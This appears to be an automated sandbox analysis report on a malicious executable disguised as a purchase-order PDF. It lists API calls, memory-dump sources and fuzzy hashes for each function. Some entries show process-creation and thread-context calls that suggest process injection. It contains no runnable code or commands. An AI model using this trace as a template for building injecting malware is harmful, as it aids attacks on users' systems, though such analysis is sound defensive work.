                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 1194219731-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0ca74ca22c93bbdecf3c61efd9645c69edf031a3cdd9ada680c74e67e1c8a1c6
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ca74ca22c93bbdecf3c61efd9645c69edf031a3cdd9ada680c74e67e1c8a1c6
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                                                                                                                                                                                                                            Function 0553C2D0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0553CA8B
                                                                                                                                                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0553CB21
                                                                                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0553CB43
                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 0553CE4C
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 572931308-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c5347b81de31fe322318ac143d5ad7503c5525a24d4d98ae8bc56a200060b54f
                                                                                                                                                                                                                                                                                                            • Instruction ID: dd1ecfe155c6534f835749160517ea1ace67e84d6524617e4432aeaf56d9b50d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5347b81de31fe322318ac143d5ad7503c5525a24d4d98ae8bc56a200060b54f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB620A30A14258DBEB24CFA4C851BEEB376FF58300F1095A9D10DEB290E7799E85CB59
                                                                                                                                                                                                                                                                                                            Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                                                                                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                                                                                                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1411284514-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                                                                                                                                                            • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                                                                                                                                                                                                                            Function 004734B7 Relevance: 4.7, APIs: 3, Instructions: 234COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                                                                                                                                                            • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                                                                                                                                                                                                            Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                                                                                                                                                                                            • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                                                                                                                                                                                                            Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 00435278
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 00435288
                                                                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 00435298
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 680241177-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                                                                                                                                                                                            • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                                                                                                                                                                                                                                            Function 0553D360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0553D3BA
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                                                                            • API String ID: 963392458-2746444292
                                                                                                                                                                                                                                                                                                            • Opcode ID: a782293119ad2c684ee7f4e1b7c6ce7e54987cc35907e67b60f32668cf9ab6a9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2ed0b52ac64fda2a277fa10ee5d5329a839a24441d8090fd37aa9abe14de4ba1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a782293119ad2c684ee7f4e1b7c6ce7e54987cc35907e67b60f32668cf9ab6a9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E01127290430CABDB20DFE0CC4AFFE777CBF44741F508509AB1A9A180EA749A088B91
                                                                                                                                                                                                                                                                                                            Function 00401B70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                            • String ID: @EXITCODE
                                                                                                                                                                                                                                                                                                            • API String ID: 580348202-3436989551
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
                                                                                                                                                                                                                                                                                                            • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                                                                                                                                                                                                                                            Function 0553C2CD Relevance: 3.4, APIs: 2, Instructions: 400processthreadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 0553CA8B
                                                                                                                                                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0553CB21
                                                                                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0553CB43
                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 0553CE4C
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2078097907.000000000553B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0553B000, based on PE: false
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_553b000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 572931308-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1410da97c1c912e366cdd2316cb6e2da26cba2f02901dc8eb5c106db15075d5a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 68b10aff7fde54a72f57e75119c24d543d7d15a240d45b11ed340bab04d2e8b1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1410da97c1c912e366cdd2316cb6e2da26cba2f02901dc8eb5c106db15075d5a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7312CF24A24658C6EB24DF64D8507DEB332FF68300F1054E9910DEB7A4E77A4E85CB5A
                                                                                                                                                                                                                                                                                                            Function 0040B380 Relevance: 3.3, APIs: 2, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9f22ab2b20b1b15fa78bc83096d760961c9a8d2d045f27beb243143d28b696ab
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f22ab2b20b1b15fa78bc83096d760961c9a8d2d045f27beb243143d28b696ab
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                                                                                                                                                                                                                                                            Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
